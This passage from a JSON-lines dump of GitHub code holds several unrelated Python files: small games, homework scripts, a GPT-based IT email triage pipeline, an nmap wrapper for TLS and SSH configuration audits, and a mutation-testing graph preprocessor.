in state:\n # if it is empty we can make a move by placing a token\n if i != \"X\" and i != \"O\":\n s = list.copy(state)\n s[i] = player_token\n moveState = (i, s)\n successors.append(moveState)\n\n return successors\n\n\ndef display(state):\n print(\"-----\")\n for c in [0, 3, 6]:\n print(state[c + 0], state[c + 1], state[c + 2])\n\n\ndef main():\n board = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n while not is_terminal(board):\n board[minmax_decision(board)] = 'X'\n if not is_terminal(board):\n display(board)\n board[int(input('Your move? '))] = 'O'\n display(board)\n\n\ndef argmax(iterable, func):\n return max(iterable, key=func)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"antje12/4-Artificial-Intelligence","sub_path":"Lab 5 - Adversarial search/Exercises/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"39081893318","text":"import openai\n\nwith open('apikey.txt', 'r') as f:\n API_KEY: str = f.read().strip()\n\nopenai.api_key = API_KEY\n\ncommon_prompt = \"You work for the IT department. \" \\\n \"Be verbose in your response. Clarify all of your thinking, and show all of your work. \" \\\n \"Be as descriptive as possible as to why you are making certain choices or assumptions. \" \\\n \"Use logical chain of thought as much as possible. \" \\\n \"Utilize all clues given so far to uncover any potential issues, being genius, clever, and brilliant.\" \\\n \"Have all of your output be in Markdown format. \"\n\nemail_analyzer_prompt = \"You are an email analyzer bot specialized in understanding and extracting information from \" \\\n \"technical support emails. Analyze the given email, identify the context, main issue, \" \\\n \"any relevant details, and any missing information. Provide a clear and concise summary of \" \\\n \"the problem and its context. Example: 'The user is facing issues with Wi-Fi connectivity at \" \\\n \"their office and needs assistance in fixing it.' \"\n\ntroubleshooting_bot_prompt = \"You are a troubleshooting bot that provides step-by-step guidance based on the problem \" \\\n \"summary given by the Email Analyzer Bot. Generate a list of troubleshooting steps that \" \\\n \"can help the user resolve the issue they're facing. Be specific and clear in your \" \\\n \"instructions, and consider different possible causes for the issue. Example: '1. Check \" \\\n \"if the Wi-Fi is turned on. 2. Restart the router and try reconnecting. 3. Check if \" \\\n \"other devices can connect to the same Wi-Fi network.' \"\n\nit_specialist_bot_prompt = \"You are an IT specialist bot that analyzes technical issues from a broader IT \" \\\n \"perspective. Using the problem summary from the Email Analyzer Bot, provide any \" \\\n \"additional insights or suggestions that could help resolve the issue, taking into account \"\\\n \"hardware, software, and potential compatibility issues. Example: 'The user might want to \" \\\n \"check if their device's network drivers are up-to-date, as outdated drivers could cause \" \\\n \"connectivity issues.' \"\n\nnetworking_specialist_bot_prompt = \"You are a networking specialist bot that analyzes technical issues specifically \" \\\n \"related to networking. Based on the problem summary from the Email Analyzer Bot, \" \\\n \"provide any additional insights or suggestions that could help resolve the issue, \"\\\n \"taking into account network configuration, equipment, and potential interference \" \\\n \"sources. Example: 'The user should check if there's any physical obstruction or \" \\\n \"electronic devices causing interference near the router, as this might affect the \"\\\n \"Wi-Fi signal.' \"\n\nsummary_and_decision_bot_prompt = \"You are a summary and decision bot that consolidates information from multiple \" \\\n \"specialized bots to determine the best course of action. Review the information \" \\\n \"provided by the Email Analyzer, Troubleshooting, IT Specialist, and Networking \" \\\n \"Specialist bots. Summarize their inputs and recommend the most effective solution \" \\\n \"and reply to the user, taking into account all perspectives and suggestions. \" \\\n \"Example: 'Based on the inputs from all bots, the user should first try the \" \\\n \"troubleshooting steps, check their device's network drivers, and ensure there's no \"\\\n \"interference near the router. A suggested reply to the user would include these \" \\\n \"recommendations.' \"\n\n\n# Define the email content\nemail_title = input(\"Email Title: \")\nemail_body = input(\"Email Body:\")\nemail = f\"Title: {email_title}\\nBody: {email_body}\"\n\n# Email Analyzer Bot\nanalyzer_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{email_analyzer_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": email}\n ]\n)\n\nanalyzer_response_formatted = f\"Email Analyzer Bot: {analyzer_response['choices'][0]['message']['content']}\"\n\nprint(analyzer_response_formatted)\n\n# Troubleshooting Bot\ntroubleshooting_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{troubleshooting_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\"}]\n)\n\ntroubleshooting_response_formatted = f\"Troubleshooting Bot:\" \\\n f\"{troubleshooting_response['choices'][0]['message']['content']}\"\n\nprint(troubleshooting_response_formatted)\n\n# IT Specialist Bot\nit_specialist_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{it_specialist_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\\n\"\n f\"{troubleshooting_response_formatted}\"}]\n)\n\nit_specialist_response_formatted = f\"IT Specialist Bot: {it_specialist_response['choices'][0]['message']['content']}\"\n\nprint(it_specialist_response_formatted)\n\n# Networking Specialist Bot\nnetworking_specialist_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{networking_specialist_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\\n\"\n f\"{troubleshooting_response_formatted}\\n\"\n f\"{it_specialist_response_formatted}\"}\n ]\n)\n\nnetworking_specialist_response_formatted = \\\n f\"Networking Specialist Bot: {networking_specialist_response['choices'][0]['message']['content']}\"\n\nprint(networking_specialist_response_formatted)\n\n# Summary and Decision Bot\nsummary_decision_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{summary_and_decision_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\\n\"\n f\"{troubleshooting_response_formatted}\\n\"\n f\"{it_specialist_response_formatted}\\n\"\n f\"{networking_specialist_response_formatted}\"}]\n)\n\nsummary_decision_response_formatted = \\\n f\"Summary and Decision Bot: {summary_decision_response['choices'][0]['message']['content']}\"\n\n# Print the final response from the Summary and Decision Bot\nprint(summary_decision_response_formatted)\n","repo_name":"randomdavis/email_it_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21581143365","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 5 00:00:00 2020\n\n@author: Andrew Mashhadi\n\"\"\"\n\n#%%\nimport numpy as np\nimport matplotlib.image as mpimg\n\n#%% Q1\na = mpimg.imread('a.jpg')\nb = mpimg.imread('b.jpg')\n\nfrom_y = (a.shape[0] - b.shape[0]) // 2\nto_y = (a.shape[0] + b.shape[0]) // 2\n\nfrom_x = (a.shape[1] - b.shape[1]) // 2\nto_x = (a.shape[1] + b.shape[1]) // 2\n\nc = a.copy()\nc[from_y:to_y, from_x:to_x, :] = b\n\nmpimg.imsave('c.jpg', c)\n\n#%% Q2\nd = mpimg.imread('d.jpg')\ne = mpimg.imread('e.jpg')\n\nabs_diff = np.abs(d.astype(np.int32) - e.astype(np.int32))\nf = abs_diff.astype(np.uint8)\n\nmpimg.imsave('f.jpg', f)\n\n#%% Q3\nminion = mpimg.imread('g.jpg')\nshugga = mpimg.imread('h.jpg')\n\ni = shugga.copy()\ntop_m = i.shape[0] - minion.shape[0]\nleft_m = (i.shape[1] - minion.shape[1]) // 2\nright_m = (i.shape[1] + minion.shape[1]) // 2\nsub_i = i[top_m:, left_m:right_m, :]\n\nL1 = minion[:,:,0] <= 80\nL2 = 180 <= minion[:,:,1]\nL3 = minion[:,:,2] <= 60\nbgPxls = L1 & L2 & L3\n\nsub_i[~bgPxls] = minion[~bgPxls]\n\nmpimg.imsave('i.jpg', i)","repo_name":"andrewmashhadi/Python_For_Applications","sub_path":"Assignment #5/hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3183195029","text":"import subprocess\nimport defusedxml.ElementTree\nimport os.path\n\nfrom . import base\n\nNMAP_CMD=\"/usr/bin/nmap\"\nSUDO_CMD=\"/usr/bin/sudo\"\nTIMEOUT_CMD=\"/usr/bin/timeout\"\n\nclass NmapScript(object):\n cmd=NMAP_CMD\n script_name=\"\"\n\n def _argv(self,hostadr,port,**kwargs):\n argv=[\n \"-oX\",\n \"-\",\n \"-Pn\",\n \"-p\",\n str(port),\n \"--script\",\n self.script_name,\n hostadr\n ]\n return argv\n\n def __call__(self,hostadr,port,**kwargs):\n argv=self._argv(hostadr,port,**kwargs)\n cmd=[self.cmd]+argv\n kwargs_c={\n \"capture_output\": True,\n \"timeout\": 60\n }\n\n if \"proxychains\" in kwargs and kwargs[\"proxychains\"] is not None:\n cmd=[\"proxychains\"]+cmd\n kwargs_c[\"cwd\"]=kwargs[\"proxychains\"]\n\n print(cmd)\n\n compl=subprocess.run(\n cmd,\n **kwargs_c,\n #capture_output=True,\n #timeout=60\n )\n\n if compl.returncode!=0:\n raise base.CommandError(compl.returncode,compl.stderr,compl.stdout)\n\n err=compl.stderr.decode()\n out=compl.stdout.decode()\n root=defusedxml.ElementTree.fromstring(out)\n data=self._out_parser(root)\n \n return data\n\n def _out_parser(self,tree):\n ret={\n \"info\": {\n \"nmaprun\": tree.attrib\n },\n \"hosts\": [],\n }\n for ch in tree:\n if ch.tag==\"runstats\":\n ret[\"info\"][\"runstats\"]={}\n for ch1 in ch:\n ret[\"info\"][\"runstats\"][ch1.tag]=ch1.attrib\n continue\n if ch.tag!=\"host\":\n ret[\"info\"][ch.tag]=ch.attrib\n continue\n ret[\"hosts\"].append(self._host(ch))\n return ret\n\n def _host(self,elem):\n ret={\n \"info\": elem.attrib,\n \"ports\": []\n }\n for ch in elem:\n if ch.tag!=\"ports\":\n ret[ch.tag]=ch.attrib\n continue\n for subch in ch:\n ret[\"ports\"].append(self._port(subch))\n return ret\n\n def _port(self,elem):\n ret={\n \"info\": elem.attrib,\n }\n for ch in elem:\n if ch.tag!=\"script\":\n ret[ch.tag]=ch.attrib\n continue\n ret[ch.tag]=ch.attrib[\"id\"]\n for subch in ch:\n ret=self._script_child(ret,subch)\n return ret\n\n def _script_child(self,ret,child):\n return ret\n\nclass NmapScriptUdp(NmapScript):\n sudo=SUDO_CMD\n timeout=60\n timeout_cmd=TIMEOUT_CMD\n\n def _proxychains_to_proxy(self,proxychains):\n if proxychains is None: return None\n fname=os.path.join(proxychains,'proxychains.conf')\n with open(fname) as fd:\n for r in fd.readlines():\n r=r.strip()\n if r.startswith('socks5'):\n t=r.split()\n # nmap vuole socks4\n return \"socks4://%s:%s\" % (t[1],t[2]) \n return None\n\n\n def _argv(self,hostadr,port,**kwargs):\n argv=NmapScript._argv(self,hostadr,port,**kwargs)\n argv+=['-sU']\n if \"proxychains\" in kwargs and kwargs[\"proxychains\"] is not None:\n proxy=self._proxychains_to_proxy(kwargs[\"proxychains\"])\n if proxy is not None:\n argv+=[\n \"--proxies\",\n proxy\n ]\n return argv\n\n def __call__(self,hostadr,port,**kwargs):\n argv=self._argv(hostadr,port,**kwargs)\n\n cmd=[\n self.sudo,\n self.timeout_cmd,\n str(self.timeout),\n self.cmd\n ]+argv\n\n kwargs_c={\n \"capture_output\": True\n }\n\n print(cmd)\n\n compl=subprocess.run(\n cmd,\n **kwargs_c\n )\n\n if compl.returncode!=0:\n raise base.CommandError(compl.returncode,compl.stderr,compl.stdout)\n\n err=compl.stderr.decode()\n out=compl.stdout.decode()\n root=defusedxml.ElementTree.fromstring(out)\n data=self._out_parser(root)\n \n return data\n\n\n# nmap http\n\nclass NmapScriptHttp(NmapScript):\n\n def _argv(self,hostadr,port,**kwargs):\n argv=[\n \"-oX\",\n \"-\",\n \"-Pn\",\n \"-p\",\n str(port),\n \"--script\",\n self.script_name,\n ]\n \n if \"servername\" in kwargs and kwargs[\"servername\"] is not None:\n argv+=[\"--script-args\",\"tls.servername=%s\" % kwargs[\"servername\"] ]\n\n argv.append(hostadr)\n return argv\n\nclass NmapSSLEnumCiphers(NmapScriptHttp):\n script_name=\"ssl-enum-ciphers\"\n\n def _script_child(self,ret,child):\n if \"protocols\" not in ret:\n ret[\"protocols\"]=[]\n if \"results\" not in ret:\n ret[\"results\"]={}\n\n if child.tag==\"elem\":\n ret[\"results\"][child.attrib[\"key\"]]=child.text\n return ret\n\n ret[\"protocols\"].append(self._ssl_protocol(child))\n return ret\n\n def _ssl_protocol(self,elem):\n ret={\n \"name\": elem.attrib[\"key\"],\n \"ciphers\": []\n }\n for ch in elem:\n if ch.tag==\"elem\":\n ret[ch.attrib[\"key\"]]=ch.text\n continue\n if ch.attrib[\"key\"]!=\"ciphers\":\n ret[ch.attrib[\"key\"]]=[]\n for subch in ch:\n ret[ch.attrib[\"key\"]].append(subch.text)\n continue\n continue\n for subch in ch:\n d={}\n for ech in subch:\n d[ech.attrib[\"key\"]]=ech.text\n ret[\"ciphers\"].append(d)\n return ret\n\nclass NmapSSLCertificate(NmapScriptHttp):\n script_name=\"ssl-cert\"\n\n def _script_child(self,ret,child):\n if \"cert_info\" not in ret:\n ret[\"cert_info\"]={}\n\n if child.tag==\"elem\":\n ret[\"cert_info\"][child.attrib[\"key\"]]=child.text\n return ret\n\n if \"key\" in child.attrib and child.attrib[\"key\"] not in [\"extensions\"]:\n ret[child.attrib[\"key\"]]=self._table(child)\n return ret\n\n ret[\"extensions\"]=self._extensions(child)\n return ret\n\n def _extensions(self,elem):\n ret=[]\n print(\"++++\",elem.tag,elem.attrib)\n for ch in elem:\n ret.append(self._ext_table(ch))\n return ret\n\n def _ext_table(self,elem):\n ret={}\n for ch in elem:\n if ch.tag!=\"elem\": continue\n k=ch.attrib[\"key\"]\n if k==\"critical\":\n ret[k]=(ch.text.strip()==\"true\")\n else:\n ret[k]=ch.text\n return ret\n\n def _table(self,elem):\n ret={}\n for ch in elem:\n if ch.tag==\"elem\":\n ret[ch.attrib[\"key\"]]=ch.text\n return ret\n\nclass NmapHttpTrace(NmapScriptHttp):\n script_name=\"http-trace\"\n\n def _port(self,elem):\n ret={\n \"info\": elem.attrib,\n }\n for ch in elem:\n if ch.tag!=\"script\":\n ret[ch.tag]=ch.attrib\n continue\n ret[ch.tag]=ch.attrib[\"id\"]\n ret[\"output\"]=ch.attrib[\"output\"]\n \n if \"output\" not in ret:\n ret[\"output\"]=\"\"\n\n return ret\n\n# Nmap ssh\n\nclass NmapSSH2EnumAlgos(NmapScript):\n script_name=\"ssh2-enum-algos\"\n\n\n def _argv(self,hostadr,port,**kwargs):\n argv=[\n \"-oX\",\n \"-\",\n \"-Pn\",\n ]\n argv+=[\n \"-p\",\n str(port),\n ]\n\n if port not in [ 22, '22']:\n argv+=['-sV']\n\n argv+=[\n \"--script\",\n self.script_name,\n hostadr\n ]\n\n return argv\n\n def _script_child(self,ret,child):\n if \"algorithms\" not in ret:\n ret[\"algorithms\"]=[]\n ret[\"algorithms\"].append(self._algorithms(child))\n return ret\n\n def _algorithms(self,elem):\n ret={\n \"name\": elem.attrib[\"key\"],\n \"list\": []\n }\n for ch in elem:\n if ch.tag==\"elem\":\n ret[\"list\"].append(ch.text)\n continue\n return ret\n\nclass NmapMDNSDetection(NmapScriptUdp):\n script_name=\"dns-service-discovery\"\n","repo_name":"chiara-paci/grisu","sub_path":"lib/python/grisulib/commands/nmap.py","file_name":"nmap.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"130617943","text":"import sys\nsys.setrecursionlimit(500005)\n#sys.setrecursionlimit(10**9)\n#import pypyjit # this is for solving slow issue for pypy when using recursion but python will not need this (test will fail but submit works)\n#pypyjit.set_param('max_unroll_recursion=-1')\n\n\nN = int(input())\nS = str(input())\n\nans = []\n\nfor i in range(len(S)):\n ans.append(S[i])\n if i+1 0: \n edges_list = []\n edge_label_list = []\n # edge_node_type_list = []\n for i, j, edge in G.edges(data=True):\n edge_type = edge['label'] \n edges_list.append((i, j))\n # edge_node_type_list.append(edge['type'])\n edge_label_list.append(edge_type)\n # edges_list.append((j, i))\n # edge_type_list.append(edge_type)\n if edge_type == VariableDeclaration:\n dv_mask_list.append(True)\n else:\n dv_mask_list.append(False)\n \n # data.edge_index: Graph connectivity in COO format with shape [2, num_edges]\n edge_index = torch.tensor(np.array(edges_list).T, dtype=torch.long )\n dv_mask = torch.tensor(np.array(dv_mask_list), dtype=bool)\n # data.edge_attr: Edge feature matrix with shape [num_edges, num_edge_features]\n # edge_type_list_np = np.array(edge_type_list)\n # print(np.array(edge_type_list))\n edge_attr = torch.tensor(np.array(edge_label_list), dtype=torch.long)\n # edge_node_attr = torch.tensor(np.array(edge_node_type_list), dtype=torch.long)\n #print(edge_attr.size())\n else: # mol has no bonds\n edge_index = torch.empty((2, 0), dtype=torch.long)\n edge_attr = torch.empty((0), dtype=torch.long)\n #edge_node_attr = torch.empty((2, 0), dtype=torch.long)\n dv_mask = torch.empty((0), dtype=torch.long)\n\n assert edge_index.shape[-1] == len(edge_attr), f\"{edge_index}, {edge_attr.shape}, {len(G.nodes()) }\"\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\n data.node_type = x_type\n data.variable_declar_mask = variable_declar_mask\n data.dv_mask = dv_mask\n data.ins_length = ins_length\n return data\n\n\n \ndef preprocess(class_method_id_json, graph_json , rawins_json\n , nodetype, edgetype, tokenizer_word2vec, dataname, graph_meta_info, datatype, outputdir):\n inputgraph_meta = json.load( open( graph_json ) )\n print(graph_json)\n rawins_meta = json.load( open( rawins_json ) )\n graph_id_list = [ ]\n graph_labels = []\n data_list = []\n print(class_method_id_json)\n for method_id in graph_meta_info: \n assert method_id in inputgraph_meta\n graph_string = inputgraph_meta[ method_id ]\n instructions = {}\n if method_id not in rawins_meta:\n print(f\"{class_method_id_json}, {method_id} \")\n instructions.update( rawins_meta[ method_id ][\"Local\"] )\n instructions.update( rawins_meta[ method_id ][\"Unit\"] )\n g_meta = nx_agraph.from_agraph(pygraphviz.AGraph(graph_string, directed=True))\n if len(g_meta.nodes) == 0:\n continue\n simple_graph = nx.DiGraph()\n \n id_rename_mapping = {}\n for (nid, info) in list( g_meta.nodes(data=True) ):\n ntype = int( nodetype[ info[\"type\"] ] )\n ins = instructions[nid]\n subwordsOfins = tokenizer_word2vec.get_tokens_id(ins.strip())\n feat = subwordsOfins + [ 0 ] * (100 - len(subwordsOfins) ) if len(subwordsOfins) < 100 else subwordsOfins[:100]\n simple_graph.add_node(nid, type= ntype, feat=feat,ins_length = min(100, len(subwordsOfins) ))\n\n for e1, e2, a in g_meta.edges( data=True ):\n if len( g_meta[e1][e2] ) > 1:\n #print( g_meta[e1][e2] )\n paralle_edges=[ edgetype[ g_meta[e1][e2][i][\"label\"]] for i in g_meta[e1][e2] ]\n paralle_edges = sorted(paralle_edges)\n if paralle_edges == [0, 1]:\n etype = int( edgetype[ \"DataDependence|ControlDependence\" ] ) \n if paralle_edges == [0, 2]:\n etype = int( edgetype[ \"Controlfow|DataDependence\" ] )\n if paralle_edges == [1, 2]:\n etype = int( edgetype[ \"Controlfow|ControlDependence\" ] ) \n if paralle_edges == [0, 1, 2]:\n etype= int( edgetype[ \"Controlfow|ControlDependence|ControlDependence\" ] )\n else:\n etype = int( edgetype[ a[\"label\"] ] ) \n simple_graph.add_edge( e1, e2, label=etype, type=[int(simple_graph.nodes[e1][\"type\"]), int(simple_graph.nodes[e2][\"type\"])] )\n \n\n # rename id from 0 to number of nodes - 1\n counter = 0\n for i in sorted(simple_graph):\n id_rename_mapping[i] = counter\n counter += 1\n simple_graph = nx.relabel_nodes( simple_graph, id_rename_mapping, copy=False )\n data_geometric = nx_to_graph_data_obj_simple( simple_graph )\n \n # print(data_geometric.y )\n data_geometric.graphID = int(method_id) \n if datatype == \"mutants\":\n data_geometric.mutantID = int(graph_meta_info[method_id][\"mid\"])\n #data_geometric.interaction_mid = int(graph_meta_info[method_id][\"interaction\"])\n data_geometric.interaction_graph_id = -1 #int(graph_meta_info[method_id][\"interaction_mutant_graph_id\"])\n data_geometric.mutant_type = int(graph_meta_info[method_id][\"mutator_label\"])\n data_geometric.label_k_binary = int( graph_meta_info[method_id][\"killed_label\"] )\n data_geometric.label_k_mul = int( graph_meta_info[method_id][\"killabel_mutator_label\"] )\n data_geometric.label_r_binary = int( graph_meta_info[method_id][\"relevance_label\"] )\n data_geometric.label_r_mul = int( graph_meta_info[method_id][\"relevance_mutator_label\"] )\n data_geometric.org_graph_id = int( graph_meta_info[method_id][\"org_graph_id\"])\n data_geometric.on_change = int( graph_meta_info[method_id][\"On_Change\"])\n data_geometric.submsuing_r = int( graph_meta_info[method_id][\"subming_relevant\"] )\n data_geometric.submsuing = int( graph_meta_info[method_id][\"subsuming\"] )\n # data_geometric.y= int( graph_meta_info[method_id][\"label\"] )\n graph_id_list.append( method_id )\n elif datatype == \"original\":\n data_geometric.mutantID = -1\n # data_geometric.interaction_mid = -1\n data_geometric.interaction_graph_id = -1\n data_geometric.mutant_type = -1\n data_geometric.label_k_binary = -1\n data_geometric.label_k_mul = -1\n data_geometric.label_r_binary = -1\n data_geometric.label_r_mul = -1\n data_geometric.org_graph_id = -1\n data_geometric.on_change = -1\n data_geometric.submsuing_r = -1\n data_geometric.submsuing = -1\n graph_id_list.append( int(method_id) )\n else:\n assert False\n data_list.append( data_geometric )\n #graph_labels.append( data_geometric.graph_label )\n \n del g_meta\n del simple_graph\n torch.save([data_list, graph_id_list ], osp.join(outputdir, f\"{dataname}.pt\"))\n return len(data_list)\n\n\ndef preprocess_relevance(pfolder):\n print(pfolder)\n mutant_meta = json.load( open( os.path.join(pfolder, \"mutants_info_graph_ids.json\") ) )\n # mutant_types = json.load( open( os.path.join(pfolder, \"mutants_type.json\") ) )\n if mutant_meta is None:\n print(f\"========================= {pfolder}\")\n return\n tokenizer_word2vec = TokenIns(\n word2vec_file=word2vec_file,\n tokenizer_file=tokenizer_file\n )\n nodetype = json.load( open(\"../tokens/instruction_type.json\") )\n edgetype = json.load( open(\"../tokens/edge_type.json\") )\n\n mutant2Graph = {}\n org2Mutant = set()\n for mutant_id in mutant_meta:\n mutant_meta[ mutant_id ][\"mid\"] = mutant_id\n assert mutant_meta[mutant_id][\"mutant_graph_id\"] not in mutant2Graph\n mutant2Graph[mutant_meta[mutant_id][\"mutant_graph_id\"]] = mutant_meta[ mutant_id ]\n assert \"subming_relevant\" in mutant_meta[ mutant_id ], f\"{pfolder}\"\n org2Mutant.add( mutant_meta[mutant_id][\"org_graph_id\"] )\n\n tasks = { \"original\":org2Mutant, \"mutants\":mutant2Graph }\n pid = os.path.basename( pfolder )\n #try:\n for k,v in tasks.items():\n outputdir = os.path.join( outputfolder, pid, \"raw\", k, \"graph\")\n os.makedirs(outputdir, exist_ok=True)\n class_method_id_json = os.path.join( pfolder, k, \"class_method_id_mapping.json\" )\n rawins_json = os.path.join(pfolder, k, \"RawIns.json\")\n for dataname in [ \"DV_CFG\", \"DV_PDG\" , \"ORG_PDG\" , \"ORG_CFG\"]: \n graph_json = os.path.join(pfolder, k, f\"{dataname}.json\")\n preprocess(class_method_id_json, graph_json , rawins_json\n , nodetype, edgetype, tokenizer_word2vec, dataname, v, k,outputdir)\n # except Exception as e:\n # print(e)\n # outputdir = os.path.join( outputfolder, pid)\n # shutil.rmtree(outputdir)\n\ndef copy_folder(pfolder):\n mutant_meta =os.path.join(pfolder, \"mutants_info_graph_ids.json\") \n pid = os.path.basename( pfolder )\n outputdir = os.path.join( outputfolder, pid, \"raw\", \"mutants\")\n try:\n shutil.copy( mutant_meta, outputdir)\n except:\n print(outputdir)\n \ndef run_copy(data_folder):\n eggs = []\n for project in os.listdir( data_folder ):\n pfolder = os.path.join( data_folder, project ) \n for c in os.listdir( os.path.join( pfolder ) ):\n eggs.append( os.path.join( pfolder, c ) )\n with Pool(15) as p:\n p.map(copy_folder, eggs) \n\ndef run(data_folder):\n eggs = []\n for project in os.listdir( data_folder ):\n pfolder = os.path.join( data_folder, project ) \n for c in os.listdir( os.path.join( pfolder ) ):\n eggs.append( os.path.join( pfolder, c ) )\n with Pool(15) as p:\n p.map(preprocess_relevance, eggs)\n\n\nimport argparse\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-o\", \"--output\", dest=\"output\", default=\"../dataset/pittest\")\n parser.add_argument(\"-i\", \"--input\", dest=\"input\", default=\"./relevance_java_dot_byteinfo\")\n args = parser.parse_args()\n outputfolder = args.output\n run( args.input )\n run_copy(args.input )\n \n\n \n \n\n \n\n\n","repo_name":"Marvinmw/few_shot_learning","sub_path":"preprocess/process_relevance_pytorchgraph.py","file_name":"process_relevance_pytorchgraph.py","file_ext":"py","file_size_in_byte":12163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70381531166","text":"from random import randint\r\n\r\n#empty game board\r\nboard = []\r\n\r\n#creating board\r\nfor x in range(0, 5):\r\n board.append([\"O\"] * 5)\r\n\r\n# print a square board\r\ndef print_board(board):\r\n for row in board:\r\n print(\"\".join(row))\r\n\r\n\r\nprint_board(board)\r\n\r\n#position of ship, y-axis\r\ndef random_row(board):\r\n return randint(0, len(board) - 1)\r\n\r\n#position of ship, x-axis\r\ndef random_col(board):\r\n return randint(0, len(board[0]) - 1)\r\n\r\n#print position of ship\r\nship_row = random_row(board)\r\nship_col = random_col(board)\r\nprint(ship_row)\r\nprint(ship_col)\r\n\r\n#max 4 turns\r\nfor turn in range(4):\r\n\r\n print(\"Turn\", turn + 1)\r\n guess_row = int(input(\"Guess Row: \"))\r\n guess_col = int(input(\"Guess Col: \"))\r\n\r\n if guess_row == ship_row and guess_col == ship_col:\r\n #correct assumption\r\n print(\"Congratulations! You sank my battleship!\")\r\n break\r\n #out of range\r\n elif guess_row not in range(5) or guess_col not in range(5):\r\n print(\"Oops, that's not even in the ocean.\")\r\n #already guessed\r\n elif board[guess_row][guess_col] == \"X\":\r\n print(\"You guessed that one already.\")\r\n #unsuccessful attempts\r\n else:\r\n print(\"You missed my battleship!\")\r\n board[guess_row][guess_col] = \"X\"\r\n\r\n if turn == 3:\r\n print(\"Game Over\")\r\nprint_board(board)\r\n","repo_name":"FirePing32/battleship-game","sub_path":"Battleship Game.py","file_name":"Battleship Game.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44886636128","text":"'''\n) Volem fer un programa que donar un número per teclat\nens digui per pantalla si es tracta d’un nombre primer.\nUn nombre primer ha de ser exclusivament divisible per 1\ni per si mateix. Per exemple, l’11 és primer, doncs es pot\ndividir per 1 i per 11, però no per 2,3,4,5,6, 7, 8, 9 o 10.\n'''\n\n\n#programa numeros primos\n\n\n#variables\n\ncont = 2\nnum = 0\nresultado = \"es primo\"\n#codigo\n\nprint (\"Introduce un número para ver si es primo\")\nnum = int (input())\n\nwhile (cont < num):\n if (num % cont == 0):\n resultado = \"no es primo\"\n cont = cont + 1\nif (num == 1):\n resultado = \"no es primo\"\nprint (\"El número\", num, resultado)\n","repo_name":"alexcatmu/CFGS_DAM","sub_path":"PRIMERO/python/ejercicio24.py","file_name":"ejercicio24.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43984418264","text":"import torch\nimport torch.nn as nn\nimport torch.nn.utils.rnn as rnn_utils\nimport torch.nn.functional as F\n\nclass _ENC_NETWORK(nn.Module):\n def __init__(self, vocab_obj, args):\n super(_ENC_NETWORK, self).__init__()\n\n # self.m_device = device\n self.m_user_size = vocab_obj.user_size\n self.m_item_size = vocab_obj.item_size\n self.m_vocab_size = vocab_obj.vocab_size\n\n self.m_hidden_size = args.hidden_size\n self.m_layers_num = args.layers_num\n self.m_dropout_rate = args.dropout\n self.m_latent_size = args.latent_size\n\n self.m_embedding_size = args.embedding_size\n\n self.m_embedding = nn.Embedding(self.m_vocab_size, self.m_embedding_size)\n self.m_user_embedding = nn.Embedding(self.m_user_size, self.m_latent_size)\n self.m_item_embedding = nn.Embedding(self.m_item_size, self.m_latent_size)\n\n user_cnt = torch.zeros((self.m_user_size, 1))\n item_cnt = torch.zeros((self.m_item_size, 1))\n\n self.register_buffer(\"m_user_cnt\", user_cnt)\n self.register_buffer(\"m_item_cnt\", item_cnt)\n\n self.m_user_encoder = _ENCODER(self.m_embedding, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n self.m_item_encoder = _ENCODER(self.m_embedding, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n\n self.m_user_decoder = _DECODER(self.m_embedding, self.m_embedding_size, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n self.m_item_decoder = _DECODER(self.m_embedding, self.m_embedding_size, self.m_latent_size, self.m_hidden_size, self.m_layers_num, self.m_dropout_rate)\n\n self.m_output2vocab = nn.Linear(self.m_hidden_size, self.m_vocab_size)\n\n # self = self.to(self.m_device)\n\n def forward(self, reviews, review_lens, user_ids, item_ids):\n\n ### obtain user representation\n user_hidden = self.m_user_encoder(reviews, review_lens)\n\n ### obtain item representation\n item_hidden = self.m_item_encoder(reviews, review_lens)\n\n 